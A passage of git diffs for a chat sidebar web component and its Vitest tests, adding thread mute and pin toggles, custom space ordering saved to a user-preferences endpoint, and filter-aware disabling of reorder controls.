+  return (el.threadsBySpace.get(SPACE.projectId) || []).find((t: any) => t.id === id);
+}
+
+beforeAll(async () => {
+  await import('./chat-space-rail.js');
+});
+
+beforeEach(() => {
+  apiFetchMock.mockResolvedValue(new Response('{}', { status: 200 }));
+});
+
+afterEach(() => {
+  vi.clearAllMocks();
+  document.body.innerHTML = '';
+});
+
+describe('space rail — mute toggle', () => {
+  it('PUTs the mute endpoint and marks the thread muted', async () => {
+    const el = createRail([thread()]);
+    apiFetchMock.mockResolvedValue(new Response(JSON.stringify({ muted: true }), { status: 200 }));
+
+    await el.handleToggleMute(thread(), SPACE.projectId);
+
+    expect(apiFetchMock).toHaveBeenCalledWith(
+      '/api/v1/chat/conversations/topic-1/mute',
+      expect.objectContaining({ method: 'PUT', body: JSON.stringify({ muted: true }) })
+    );
+    expect(storedThread(el).muted).toBe(true);
+  });
+
+  it('unmutes a muted thread', async () => {
+    const el = createRail([thread({ muted: true })]);
+    apiFetchMock.mockResolvedValue(new Response(JSON.stringify({ muted: false }), { status: 200 }));
+
+    await el.handleToggleMute(thread({ muted: true }), SPACE.projectId);
+
+    expect(apiFetchMock).toHaveBeenCalledWith(
+      '/api/v1/chat/conversations/topic-1/mute',
+      expect.objectContaining({ body: JSON.stringify({ muted: false }) })
+    );
+    expect(storedThread(el).muted).toBe(false);
+  });
+
+  it('rolls back when the server refuses', async () => {
+    const el = createRail([thread()]);
+    apiFetchMock.mockResolvedValue(new Response('{}', { status: 403 }));
+
+    await el.handleToggleMute(thread(), SPACE.projectId);
+
+    expect(storedThread(el).muted).toBe(false);
+  });
+});
+
+describe('space rail — pin toggle', () => {
+  it('PUTs the pin endpoint and marks the thread pinned', async () => {
+    const el = createRail([thread()]);
+    apiFetchMock.mockResolvedValue(new Response(JSON.stringify({ pinned: true }), { status: 200 }));
+
+    await el.handleTogglePin(thread(), SPACE.projectId);
+
+    expect(apiFetchMock).toHaveBeenCalledWith(
+      '/api/v1/chat/conversations/topic-1/pin',
+      expect.objectContaining({ method: 'PUT', body: JSON.stringify({ pinned: true }) })
+    );
+    expect(storedThread(el).pinned).toBe(true);
+  });
+
+  it('rolls back when the server refuses', async () => {
+    const el = createRail([thread({ pinned: true })]);
+    apiFetchMock.mockResolvedValue(new Response('{}', { status: 500 }));
+
+    await el.handleTogglePin(thread({ pinned: true }), SPACE.projectId);
+
+    expect(storedThread(el).pinned).toBe(true);
+  });
+
+  it('sorts a pinned thread above an unpinned one', () => {
+    const el = createRail([
+      thread({ id: 'topic-plain', name: 'plain' }),
+      thread({ id: 'topic-pinned', name: 'pinned', pinned: true }),
+    ]);
+
+    const order = el.getSortedThreads(SPACE.projectId).map((t: any) => t.id);
+
+    expect(order).toEqual(['topic-pinned', 'topic-plain']);
+  });
+});
+
+describe('space rail — muted rendering', () => {
+  async function mount(threads: any[]): Promise<any> {
+    const el = createRail(threads);
+    document.body.appendChild(el);
+    // connectedCallback kicks off a load that resets state from the (mocked)
+    // API; let it settle, then put the fixture back and re-render.
+    await new Promise((resolve) => setTimeout(resolve, 0));
+    el.spaces = [SPACE];
+    el.threadsBySpace = new Map([[SPACE.projectId, threads]]);
+    el.collapsedSpaces = new Set<string>();
+    el.loading = false;
+    await el.updateComplete;
+    return el;
+  }
+
+  it('shows the unread dot for an unmuted thread', async () => {
+    const el = await mount([thread({ hasUnread: true })]);
+
+    expect(el.shadowRoot.querySelector('.unread-dot')).not.toBeNull();
+    expect(el.shadowRoot.querySelector('sl-icon[name="bell-slash"]')).toBeNull();
+  });
+
+  it('suppresses the unread dot and shows bell-slash for a muted thread', async () => {
+    const el = await mount([thread({ hasUnread: true, muted: true })]);
+
+    expect(el.shadowRoot.querySelector('.unread-dot')).toBeNull();
+    expect(el.shadowRoot.querySelector('.thread-name.unread')).toBeNull();
+    expect(el.shadowRoot.querySelector('sl-icon[name="bell-slash"]')).not.toBeNull();
+  });
+
+  it('suppresses the mention dot for a muted thread', async () => {
+    const el = await mount([thread({ hasUnread: true, hasUnreadMention: true, muted: true })]);
+
+    expect(el.shadowRoot.querySelector('.mention-dot')).toBeNull();
+  });
+
+  it('offers Mute and Pin to top in the context menu, and their inverses when set', async () => {
+    const el = await mount([thread()]);
+    el.contextMenuTarget = { type: 'thread', thread: thread(), projectId: SPACE.projectId };
+    await el.updateComplete;
+
+    expect(el.shadowRoot.querySelector('.mute-toggle')?.textContent?.trim()).toBe('Mute');
+    expect(el.shadowRoot.querySelector('.pin-toggle')?.textContent?.trim()).toBe('Pin to top');
+
+    el.contextMenuTarget = {
+      type: 'thread',
+      thread: thread({ muted: true, pinned: true }),
+      projectId: SPACE.projectId,
+    };
+    await el.updateComplete;
+
+    expect(el.shadowRoot.querySelector('.mute-toggle')?.textContent?.trim()).toBe('Unmute');
+    expect(el.shadowRoot.querySelector('.pin-toggle')?.textContent?.trim()).toBe('Unpin');
+  });
+});

--- a/web/src/components/shared/chat/chat-space-rail-order.test.ts
+++ b/web/src/components/shared/chat/chat-space-rail-order.test.ts
@@ -248,6 +248,25 @@ describe('space rail — reordering', () => {
     expect(apiFetchMock).not.toHaveBeenCalled();
   });
 
+  it('refuses to move a space while the unread filter is on', async () => {
+    const el = createRail();
+    el.prefs = { spaceSortMode: 'custom', threadSortMode: 'activity', spaceOrder: undefined };
+    el.spaceFilter = 'unread';
+
+    await el.moveSpace('p-b', -1);
+
+    expect(apiFetchMock).not.toHaveBeenCalled();
+  });
+
+  it('disables both reorder items for every space while filtering', () => {
+    const el = createRail();
+    el.prefs = { spaceSortMode: 'custom', threadSortMode: 'activity', spaceOrder: undefined };
+    el.spaceFilter = 'unread';
+
+    expect(el.isSpaceAtEdge('p-b', 'first')).toBe(true);
+    expect(el.isSpaceAtEdge('p-b', 'last')).toBe(true);
+  });
+
   it('reports which spaces sit at the edges, for disabling the menu items', () => {
     const el = createRail();
     el.prefs = { spaceSortMode: 'custom', threadSortMode: 'activity', spaceOrder: undefined };
@@ -331,6 +350,19 @@ describe('space rail — sort menu and space menu rendering', () => {
     expect(upItems[0]?.hasAttribute('disabled')).toBe(true);
     expect(upItems[1]?.hasAttribute('disabled')).toBe(false);
     expect(downItems[2]?.hasAttribute('disabled')).toBe(true);
+  });
+
+  it('greys out the move items while the unread filter hides part of the list', async () => {
+    const el = await mount();
+    el.spaces = [{ ...space('p-a', 'Alpha'), unreadCount: 1 }, space('p-b', 'Bravo')];
+    el.spaceFilter = 'unread';
+    await el.updateComplete;
+
+    const upItems = [...el.shadowRoot.querySelectorAll('.move-up')];
+    const downItems = [...el.shadowRoot.querySelectorAll('.move-down')];
+    expect(upItems).toHaveLength(1);
+    expect(upItems[0]?.hasAttribute('disabled')).toBe(true);
+    expect(downItems[0]?.hasAttribute('disabled')).toBe(true);
   });
 
   it('marks space headers as draggable', async () => {

--- a/web/src/components/shared/chat/chat-space-rail-order.test.ts
+++ b/web/src/components/shared/chat/chat-space-rail-order.test.ts
@@ -1,0 +1,343 @@
+/**
+ * Copyright 2026 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+/**
+ * Tests for custom space ordering in the rail (#1031).
+ *
+ * The rail talks to /api/v1/chat/user-prefs, where spaceOrder is a JSON array
+ * string — the shape the wire uses is easy to get wrong in one direction only,
+ * so both the read and the write are asserted. Reordering by drag and by the
+ * keyboard-reachable Move up / Move down must land on the same persisted
+ * order, and either one switches the rail to custom sort.
+ */
+
+// @vitest-environment happy-dom
+
+import { describe, it, expect, vi, beforeAll, beforeEach, afterEach } from 'vitest';
+import { apiFetch } from '../../../client/api.js';
+
+/* eslint-disable @typescript-eslint/no-explicit-any */
+
+vi.mock('../../../client/api.js', () => ({
+  apiFetch: vi.fn(() => Promise.resolve(new Response('{}', { status: 200 }))),
+}));
+
+const apiFetchMock = vi.mocked(apiFetch);
+
+function space(id: string, name: string): any {
+  return {
+    projectId: id,
+    projectName: name,
+    projectSlug: name.toLowerCase(),
+    unreadCount: 0,
+    hasUnreadMention: false,
+  };
+}
+
+/** A rail holding three spaces, in the order the server listed them. */
+function createRail(): any {
+  const el = document.createElement('scion-chat-space-rail') as any;
+  el.spaces = [space('p-a', 'Alpha'), space('p-b', 'Bravo'), space('p-c', 'Charlie')];
+  el.threadsBySpace = new Map();
+  el.collapsedSpaces = new Set<string>();
+  el.loading = false;
+  return el;
+}
+
+/**
+ * Answer user-prefs the way the server does: echo the PUT back with blank
+ * modes defaulted, so the rail's reconcile step has something real to read.
+ */
+function serveUserPrefs(stored: Record<string, string> = {}): void {
+  apiFetchMock.mockImplementation((path: string, init?: RequestInit) => {
+    if (!path.startsWith('/api/v1/chat/user-prefs')) {
+      return Promise.resolve(new Response('{}', { status: 200 }));
+    }
+    if (init?.method === 'PUT') {
+      const body = JSON.parse(String(init.body)) as Record<string, string>;
+      stored = {
+        spaceSortMode: body.spaceSortMode || 'activity',
+        threadSortMode: body.threadSortMode || 'activity',
+        spaceOrder: body.spaceOrder ?? '',
+      };
+    }
+    return Promise.resolve(new Response(JSON.stringify(stored), { status: 200 }));
+  });
+}
+
+/** The body of the last PUT to user-prefs. */
+function lastPrefsPut(): Record<string, string> {
+  const calls = apiFetchMock.mock.calls.filter(
+    (c: any[]) => c[0] === '/api/v1/chat/user-prefs' && c[1]?.method === 'PUT'
+  );
+  const last = calls[calls.length - 1] as any[];
+  return JSON.parse(String(last[1].body)) as Record<string, string>;
+}
+
+beforeAll(async () => {
+  await import('./chat-space-rail.js');
+});
+
+beforeEach(() => {
+  serveUserPrefs();
+});
+
+afterEach(() => {
+  vi.clearAllMocks();
+  document.body.innerHTML = '';
+});
+
+describe('space rail — prefs round trip', () => {
+  it('reads sort mode and order from the user-prefs endpoint', async () => {
+    const el = createRail();
+    serveUserPrefs({
+      spaceSortMode: 'custom',
+      threadSortMode: 'alpha',
+      spaceOrder: JSON.stringify(['p-c', 'p-a', 'p-b']),
+    });
+
+    await el.loadPrefs();
+
+    expect(apiFetchMock).toHaveBeenCalledWith('/api/v1/chat/user-prefs');
+    expect(el.prefs.spaceSortMode).toBe('custom');
+    expect(el.prefs.threadSortMode).toBe('alpha');
+    expect(el.prefs.spaceOrder).toEqual(['p-c', 'p-a', 'p-b']);
+  });
+
+  it('falls back to defaults when the stored order is not parseable', async () => {
+    const el = createRail();
+    serveUserPrefs({ spaceSortMode: 'custom', spaceOrder: 'not json' });
+
+    await el.loadPrefs();
+
+    expect(el.prefs.spaceSortMode).toBe('custom');
+    expect(el.prefs.spaceOrder).toBeUndefined();
+  });
+
+  it('writes the order as a JSON array string', async () => {
+    const el = createRail();
+
+    await el.savePrefs({ spaceSortMode: 'custom', spaceOrder: ['p-b', 'p-a'] });
+
+    expect(lastPrefsPut()).toEqual({
+      spaceSortMode: 'custom',
+      threadSortMode: 'activity',
+      spaceOrder: JSON.stringify(['p-b', 'p-a']),
+    });
+    expect(el.prefs.spaceOrder).toEqual(['p-b', 'p-a']);
+  });
+
+  it('reverts the local prefs when the save is refused', async () => {
+    const el = createRail();
+    apiFetchMock.mockResolvedValue(new Response('{}', { status: 500 }));
+
+    await el.savePrefs({ spaceSortMode: 'alpha' });
+
+    expect(el.prefs.spaceSortMode).toBe('activity');
+  });
+
+  it('reconciles with what the server stored, not what was requested', async () => {
+    const el = createRail();
+    apiFetchMock.mockResolvedValue(
+      new Response(JSON.stringify({ spaceSortMode: 'activity', spaceOrder: '' }), { status: 200 })
+    );
+
+    await el.savePrefs({ spaceSortMode: 'custom', spaceOrder: ['p-b'] });
+
+    expect(el.prefs.spaceSortMode).toBe('activity');
+    expect(el.prefs.spaceOrder).toBeUndefined();
+  });
+});
+
+describe('space rail — sort mode selection', () => {
+  function selectSort(el: any, value: string): void {
+    const item = document.createElement('div');
+    item.setAttribute('value', value);
+    el.handleSortSelect(new CustomEvent('sl-select', { detail: { item } }));
+  }
+
+  it('persists the alphabetical mode', async () => {
+    const el = createRail();
+
+    selectSort(el, 'alpha');
+    await Promise.resolve();
+
+    expect(lastPrefsPut().spaceSortMode).toBe('alpha');
+  });
+
+  it('freezes the visible order when custom is chosen with nothing stored', async () => {
+    const el = createRail();
+    el.prefs = { spaceSortMode: 'alpha', threadSortMode: 'activity', spaceOrder: undefined };
+
+    selectSort(el, 'custom');
+    await Promise.resolve();
+
+    expect(lastPrefsPut()).toMatchObject({
+      spaceSortMode: 'custom',
+      spaceOrder: JSON.stringify(['p-a', 'p-b', 'p-c']),
+    });
+  });
+
+  it('keeps an existing custom order when custom is re-selected', async () => {
+    const el = createRail();
+    el.prefs = { spaceSortMode: 'activity', threadSortMode: 'activity', spaceOrder: ['p-c', 'p-a'] };
+
+    selectSort(el, 'custom');
+    await Promise.resolve();
+
+    expect(lastPrefsPut().spaceOrder).toBe(JSON.stringify(['p-c', 'p-a']));
+  });
+
+  it('sorts spaces by the custom order, unknown spaces last', () => {
+    const el = createRail();
+    el.prefs = { spaceSortMode: 'custom', threadSortMode: 'activity', spaceOrder: ['p-c', 'p-b'] };
+
+    expect(el.getSortedSpaces().map((s: any) => s.projectId)).toEqual(['p-c', 'p-b', 'p-a']);
+  });
+});
+
+describe('space rail — reordering', () => {
+  it('moves a space up and persists the new order', async () => {
+    const el = createRail();
+    el.prefs = { spaceSortMode: 'custom', threadSortMode: 'activity', spaceOrder: undefined };
+
+    await el.moveSpace('p-c', -1);
+
+    expect(lastPrefsPut().spaceOrder).toBe(JSON.stringify(['p-a', 'p-c', 'p-b']));
+  });
+
+  it('moves a space down and persists the new order', async () => {
+    const el = createRail();
+    el.prefs = { spaceSortMode: 'custom', threadSortMode: 'activity', spaceOrder: undefined };
+
+    await el.moveSpace('p-a', 1);
+
+    expect(lastPrefsPut().spaceOrder).toBe(JSON.stringify(['p-b', 'p-a', 'p-c']));
+  });
+
+  it('switches to custom sort when a space is nudged in activity mode', async () => {
+    const el = createRail();
+    el.prefs = { spaceSortMode: 'activity', threadSortMode: 'activity', spaceOrder: undefined };
+
+    await el.moveSpace('p-b', -1);
+
+    expect(lastPrefsPut().spaceSortMode).toBe('custom');
+    expect(el.prefs.spaceSortMode).toBe('custom');
+  });
+
+  it('does nothing at the ends of the list', async () => {
+    const el = createRail();
+    el.prefs = { spaceSortMode: 'custom', threadSortMode: 'activity', spaceOrder: undefined };
+
+    await el.moveSpace('p-a', -1);
+    await el.moveSpace('p-c', 1);
+
+    expect(apiFetchMock).not.toHaveBeenCalled();
+  });
+
+  it('reports which spaces sit at the edges, for disabling the menu items', () => {
+    const el = createRail();
+    el.prefs = { spaceSortMode: 'custom', threadSortMode: 'activity', spaceOrder: undefined };
+
+    expect(el.isSpaceAtEdge('p-a', 'first')).toBe(true);
+    expect(el.isSpaceAtEdge('p-a', 'last')).toBe(false);
+    expect(el.isSpaceAtEdge('p-c', 'last')).toBe(true);
+  });
+
+  it('drops a dragged space onto the position of its target', async () => {
+    const el = createRail();
+    el.prefs = { spaceSortMode: 'custom', threadSortMode: 'activity', spaceOrder: undefined };
+    const dt = { effectAllowed: '', dropEffect: '', setData: vi.fn() };
+
+    el.handleSpaceDragStart({ dataTransfer: dt } as any, 'p-c');
+    el.handleSpaceDragOver({ preventDefault: vi.fn(), dataTransfer: dt } as any, 'p-a');
+    await el.handleSpaceDrop({ preventDefault: vi.fn() } as any, 'p-a');
+
+    expect(dt.setData).toHaveBeenCalledWith('text/plain', 'p-c');
+    expect(lastPrefsPut().spaceOrder).toBe(JSON.stringify(['p-c', 'p-a', 'p-b']));
+    expect(el.draggingSpaceId).toBeNull();
+    expect(el.dragOverSpaceId).toBeNull();
+  });
+
+  it('ignores a drop on the space being dragged', async () => {
+    const el = createRail();
+
+    el.handleSpaceDragStart({ dataTransfer: { setData: vi.fn() } } as any, 'p-b');
+    await el.handleSpaceDrop({ preventDefault: vi.fn() } as any, 'p-b');
+
+    expect(apiFetchMock).not.toHaveBeenCalled();
+  });
+
+  it('ignores dragover when no drag started here', () => {
+    const el = createRail();
+    const preventDefault = vi.fn();
+
+    el.handleSpaceDragOver({ preventDefault } as any, 'p-a');
+
+    expect(preventDefault).not.toHaveBeenCalled();
+    expect(el.dragOverSpaceId).toBeNull();
+  });
+});
+
+describe('space rail — sort menu and space menu rendering', () => {
+  async function mount(): Promise<any> {
+    const el = createRail();
+    document.body.appendChild(el);
+    await new Promise((resolve) => setTimeout(resolve, 0));
+    el.spaces = [space('p-a', 'Alpha'), space('p-b', 'Bravo'), space('p-c', 'Charlie')];
+    el.threadsBySpace = new Map();
+    el.collapsedSpaces = new Set<string>();
+    el.loading = false;
+    await el.updateComplete;
+    return el;
+  }
+
+  it('offers Custom alongside the other sort modes, checking the active one', async () => {
+    const el = await mount();
+    el.prefs = { spaceSortMode: 'custom', threadSortMode: 'activity', spaceOrder: undefined };
+    await el.updateComplete;
+
+    const items = [...el.shadowRoot.querySelectorAll('.rail-toolbar sl-menu-item')];
+    expect(items.map((i: any) => i.getAttribute('value'))).toEqual([
+      'activity',
+      'alpha',
+      'custom',
+    ]);
+    const checked = items.filter((i: any) => i.hasAttribute('checked'));
+    expect(checked).toHaveLength(1);
+    expect(checked[0]?.getAttribute('value')).toBe('custom');
+  });
+
+  it('offers keyboard move items on each space, disabled at the ends', async () => {
+    const el = await mount();
+
+    const upItems = [...el.shadowRoot.querySelectorAll('.move-up')];
+    const downItems = [...el.shadowRoot.querySelectorAll('.move-down')];
+    expect(upItems).toHaveLength(3);
+    expect(downItems).toHaveLength(3);
+    expect(upItems[0]?.hasAttribute('disabled')).toBe(true);
+    expect(upItems[1]?.hasAttribute('disabled')).toBe(false);
+    expect(downItems[2]?.hasAttribute('disabled')).toBe(true);
+  });
+
+  it('marks space headers as draggable', async () => {
+    const el = await mount();
+
+    const headers = [...el.shadowRoot.querySelectorAll('.space-header')];
+    expect(headers).toHaveLength(3);
+    expect(headers.every((h: any) => h.getAttribute('draggable') === 'true')).toBe(true);
+  });
+});

--- a/web/src/components/shared/chat/chat-space-rail-order.test.ts
+++ b/web/src/components/shared/chat/chat-space-rail-order.test.ts
@@ -117,6 +117,24 @@ describe('space rail — prefs round trip', () => {
     expect(el.prefs.spaceOrder).toEqual(['p-c', 'p-a', 'p-b']);
   });
 
+  it('accepts an order the server already decoded into an array', async () => {
+    const el = createRail();
+    serveUserPrefs({ spaceSortMode: 'custom', spaceOrder: ['p-c', 'p-a'] as unknown as string });
+
+    await el.loadPrefs();
+
+    expect(el.prefs.spaceOrder).toEqual(['p-c', 'p-a']);
+  });
+
+  it('drops non-string entries from a stored order', async () => {
+    const el = createRail();
+    serveUserPrefs({ spaceSortMode: 'custom', spaceOrder: JSON.stringify(['p-a', 7, null]) });
+
+    await el.loadPrefs();
+
+    expect(el.prefs.spaceOrder).toEqual(['p-a']);
+  });
+
   it('falls back to defaults when the stored order is not parseable', async () => {
     const el = createRail();
     serveUserPrefs({ spaceSortMode: 'custom', spaceOrder: 'not json' });
@@ -181,6 +199,19 @@ describe('space rail — sort mode selection', () => {
   it('freezes the visible order when custom is chosen with nothing stored', async () => {
     const el = createRail();
     el.prefs = { spaceSortMode: 'alpha', threadSortMode: 'activity', spaceOrder: undefined };
+
+    selectSort(el, 'custom');
+    await Promise.resolve();
+
+    expect(lastPrefsPut()).toMatchObject({
+      spaceSortMode: 'custom',
+      spaceOrder: JSON.stringify(['p-a', 'p-b', 'p-c']),
+    });
+  });
+
+  it('freezes the visible order when custom is chosen with an empty order stored', async () => {
+    const el = createRail();
+    el.prefs = { spaceSortMode: 'alpha', threadSortMode: 'activity', spaceOrder: [] };
 
     selectSort(el, 'custom');
     await Promise.resolve();

--- a/web/src/components/shared/chat/chat-space-rail.ts
+++ b/web/src/components/shared/chat/chat-space-rail.ts
@@ -72,18 +72,21 @@ interface RailPrefs {
 }
 
 /**
- * Read a prefs payload from the server. `spaceOrder` is stored as a JSON array
- * string, so a hand-edited or truncated value has to degrade to "no custom
- * order" rather than throwing the rail's whole load away.
+ * Read a prefs payload from the server. `spaceOrder` arrives either as a real
+ * array or as a JSON array string, so both are accepted; a hand-edited or
+ * truncated value has to degrade to "no custom order" rather than throwing the
+ * rail's whole load away. Non-string entries are dropped either way.
  */
 function parseRailPrefs(payload: unknown): RailPrefs {
   const data = (payload ?? {}) as {
     spaceSortMode?: string;
     threadSortMode?: string;
-    spaceOrder?: string;
+    spaceOrder?: unknown;
   };
   let spaceOrder: string[] | undefined;
-  if (typeof data.spaceOrder === 'string' && data.spaceOrder !== '') {
+  if (Array.isArray(data.spaceOrder)) {
+    spaceOrder = data.spaceOrder.filter((id): id is string => typeof id === 'string');
+  } else if (typeof data.spaceOrder === 'string' && data.spaceOrder !== '') {
     try {
       const parsed: unknown = JSON.parse(data.spaceOrder);
       if (Array.isArray(parsed)) {
@@ -1279,7 +1282,11 @@ export class ScionChatSpaceRail extends LitElement {
       // is currently looking at, so the list does not jump on the click.
       void this.savePrefs({
         spaceSortMode: 'custom',
-        spaceOrder: this.prefs.spaceOrder ?? this.getSortedSpaces().map((s) => s.projectId),
+        // An empty saved order counts as "no order saved yet", so test length
+        // rather than nullishness — `[]` would otherwise freeze nothing.
+        spaceOrder: this.prefs.spaceOrder?.length
+          ? this.prefs.spaceOrder
+          : this.getSortedSpaces().map((s) => s.projectId),
       });
     }
   }
@@ -1393,6 +1400,11 @@ export class ScionChatSpaceRail extends LitElement {
     `;
   }
 
+  /**
+   * Render one thread row. The trailing badge is a single choice, not two: a
+   * muted thread shows the bell and deliberately does not advertise its unread
+   * state with a dot, so mute is the first branch of one chain.
+   */
   private renderThread(thread: ChatSpaceThread, projectId: string) {
     const isSelected = thread.id === this.selectedKey;
 
@@ -1435,9 +1447,6 @@ export class ScionChatSpaceRail extends LitElement {
         ${thread.pinned ? html`<sl-icon name="star-fill" class="pin-icon"></sl-icon>` : nothing}
         ${thread.muted
           ? html`<sl-icon name="bell-slash" class="mute-icon" title="Muted"></sl-icon>`
-          : nothing}
-        ${thread.muted
-          ? nothing
           : thread.hasUnreadMention
             ? html`<span class="mention-dot"></span>`
             : thread.hasUnread

--- a/web/src/components/shared/chat/chat-space-rail.ts
+++ b/web/src/components/shared/chat/chat-space-rail.ts
@@ -752,6 +752,7 @@ export class ScionChatSpaceRail extends LitElement {
    * for everyone.
    */
   private async moveSpace(projectId: string, delta: -1 | 1): Promise<void> {
+    if (!this.canReorderSpaces()) return;
     const order = this.currentSpaceOrder();
     const from = order.indexOf(projectId);
     const to = from + delta;
@@ -762,8 +763,24 @@ export class ScionChatSpaceRail extends LitElement {
     await this.applySpaceOrder(next);
   }
 
-  /** True when the space is already at the given end of the displayed order. */
+  /**
+   * Reordering is only offered on the unfiltered list. The order that gets
+   * persisted is the global one, so "Move up" against a filtered view would
+   * swap the space with a neighbour the user cannot see — either appearing to
+   * do nothing, or quietly writing an arrangement they never chose. Reordering
+   * against the visible list instead would be worse: the same click would mean
+   * different things depending on a filter elsewhere in the rail.
+   */
+  private canReorderSpaces(): boolean {
+    return this.spaceFilter === 'all';
+  }
+
+  /**
+   * True when the reorder item should be disabled: the space is already at the
+   * given end of the displayed order, or reordering is off altogether.
+   */
   private isSpaceAtEdge(projectId: string, edge: 'first' | 'last'): boolean {
+    if (!this.canReorderSpaces()) return true;
     const order = this.currentSpaceOrder();
     const index = order.indexOf(projectId);
     if (index === -1) return true;
@@ -1291,10 +1308,10 @@ export class ScionChatSpaceRail extends LitElement {
             ? 'drag-over'
             : ''}"
           draggable="true"
-          @dragstart=${(e: DragEvent) => this.handleSpaceDragStart(e, space.projectId)}
-          @dragover=${(e: DragEvent) => this.handleSpaceDragOver(e, space.projectId)}
-          @drop=${(e: DragEvent) => void this.handleSpaceDrop(e, space.projectId)}
-          @dragend=${() => this.handleSpaceDragEnd()}
+          @dragstart=${(e: DragEvent): void => this.handleSpaceDragStart(e, space.projectId)}
+          @dragover=${(e: DragEvent): void => this.handleSpaceDragOver(e, space.projectId)}
+          @drop=${(e: DragEvent): void => void this.handleSpaceDrop(e, space.projectId)}
+          @dragend=${(): void => this.handleSpaceDragEnd()}
           @click=${() =>
             isCollapsed
               ? this.handleCollapsedSpaceClick(space)
@@ -1469,16 +1486,20 @@ export class ScionChatSpaceRail extends LitElement {
         </div>
         <div
           class="context-menu-item pin-toggle"
-          @click=${() => void this.handleTogglePin(thread, projectId)}
+          @click=${(): void => void this.handleTogglePin(thread, projectId)}
         >
-          <sl-icon name=${thread.pinned ? 'star' : 'star-fill'}></sl-icon>
+          <!-- The glyph reports the current state, the label offers the
+               action — the filled star means pinned everywhere else in this
+               rail, and a menu that used it for "will be pinned" would make
+               the row indicator ambiguous. -->
+          <sl-icon name=${thread.pinned ? 'star-fill' : 'star'}></sl-icon>
           ${thread.pinned ? 'Unpin' : 'Pin to top'}
         </div>
         <div
           class="context-menu-item mute-toggle"
-          @click=${() => void this.handleToggleMute(thread, projectId)}
+          @click=${(): void => void this.handleToggleMute(thread, projectId)}
         >
-          <sl-icon name=${thread.muted ? 'bell' : 'bell-slash'}></sl-icon>
+          <sl-icon name=${thread.muted ? 'bell-slash' : 'bell'}></sl-icon>
           ${thread.muted ? 'Unmute' : 'Mute'}
         </div>
         ${!thread.isGeneral

--- a/web/src/components/shared/chat/chat-space-rail.ts
+++ b/web/src/components/shared/chat/chat-space-rail.ts
@@ -53,6 +53,8 @@ export interface ChatSpaceThread {
   name: string;
   isGeneral: boolean;
   pinned: boolean;
+  /** Muted threads raise no notifications and show no unread marker. */
+  muted?: boolean;
   defaultAgent?: string;
   lastActivityAt?: string;
   lastMessagePreview?: string;
@@ -289,6 +291,12 @@ export class ScionChatSpaceRail extends LitElement {
     }
 
     .thread-item .pin-icon {
+      font-size: 0.625rem;
+      color: var(--scion-text-muted, #64748b);
+      flex-shrink: 0;
+    }
+
+    .thread-item .mute-icon {
       font-size: 0.625rem;
       color: var(--scion-text-muted, #64748b);
       flex-shrink: 0;
@@ -847,6 +855,64 @@ export class ScionChatSpaceRail extends LitElement {
     }
   }
 
+  /**
+   * Toggle a thread's pinned state. Applied locally first so the rail reorders
+   * on the click, and rolled back if the server refuses — a pin the server
+   * does not have would silently survive until the next reload otherwise.
+   */
+  private async handleTogglePin(thread: ChatSpaceThread, projectId: string): Promise<void> {
+    this.contextMenuTarget = null;
+    const next = !thread.pinned;
+    this.updateThread(projectId, thread.id, { pinned: next });
+    try {
+      const res = await apiFetch(
+        `/api/v1/chat/conversations/${encodeURIComponent(thread.id)}/pin`,
+        {
+          method: 'PUT',
+          headers: { 'Content-Type': 'application/json' },
+          body: JSON.stringify({ pinned: next }),
+        }
+      );
+      if (!res.ok) {
+        this.updateThread(projectId, thread.id, { pinned: thread.pinned });
+        return;
+      }
+      const data = (await res.json().catch(() => ({}))) as { pinned?: boolean };
+      if (typeof data.pinned === 'boolean' && data.pinned !== next) {
+        this.updateThread(projectId, thread.id, { pinned: data.pinned });
+      }
+    } catch {
+      this.updateThread(projectId, thread.id, { pinned: thread.pinned });
+    }
+  }
+
+  /** Toggle a thread's muted state, with the same optimistic-then-reconcile shape as pin. */
+  private async handleToggleMute(thread: ChatSpaceThread, projectId: string): Promise<void> {
+    this.contextMenuTarget = null;
+    const next = !thread.muted;
+    this.updateThread(projectId, thread.id, { muted: next });
+    try {
+      const res = await apiFetch(
+        `/api/v1/chat/conversations/${encodeURIComponent(thread.id)}/mute`,
+        {
+          method: 'PUT',
+          headers: { 'Content-Type': 'application/json' },
+          body: JSON.stringify({ muted: next }),
+        }
+      );
+      if (!res.ok) {
+        this.updateThread(projectId, thread.id, { muted: thread.muted === true });
+        return;
+      }
+      const data = (await res.json().catch(() => ({}))) as { muted?: boolean };
+      if (typeof data.muted === 'boolean' && data.muted !== next) {
+        this.updateThread(projectId, thread.id, { muted: data.muted });
+      }
+    } catch {
+      this.updateThread(projectId, thread.id, { muted: thread.muted === true });
+    }
+  }
+
   private startRename(thread: ChatSpaceThread): void {
     this.contextMenuTarget = null;
     if (thread.isGeneral) return;
@@ -1136,13 +1202,20 @@ export class ScionChatSpaceRail extends LitElement {
         @contextmenu=${(e: MouseEvent) => this.handleContextMenu(e, thread, projectId)}
       >
         <span class="hash">#</span>
-        <span class="thread-name ${thread.hasUnread ? 'unread' : ''}">${thread.name}</span>
+        <span class="thread-name ${!thread.muted && thread.hasUnread ? 'unread' : ''}"
+          >${thread.name}</span
+        >
         ${thread.pinned ? html`<sl-icon name="star-fill" class="pin-icon"></sl-icon>` : nothing}
-        ${thread.hasUnreadMention
-          ? html`<span class="mention-dot"></span>`
-          : thread.hasUnread
-            ? html`<span class="unread-dot"></span>`
-            : nothing}
+        ${thread.muted
+          ? html`<sl-icon name="bell-slash" class="mute-icon" title="Muted"></sl-icon>`
+          : nothing}
+        ${thread.muted
+          ? nothing
+          : thread.hasUnreadMention
+            ? html`<span class="mention-dot"></span>`
+            : thread.hasUnread
+              ? html`<span class="unread-dot"></span>`
+              : nothing}
       </div>
     `;
   }
@@ -1193,6 +1266,20 @@ export class ScionChatSpaceRail extends LitElement {
         <div class="context-menu-item" @click=${() => this.handleMarkSpaceRead(projectId)}>
           <sl-icon name="check-lg"></sl-icon>
           Mark space read
+        </div>
+        <div
+          class="context-menu-item pin-toggle"
+          @click=${() => void this.handleTogglePin(thread, projectId)}
+        >
+          <sl-icon name=${thread.pinned ? 'star' : 'star-fill'}></sl-icon>
+          ${thread.pinned ? 'Unpin' : 'Pin to top'}
+        </div>
+        <div
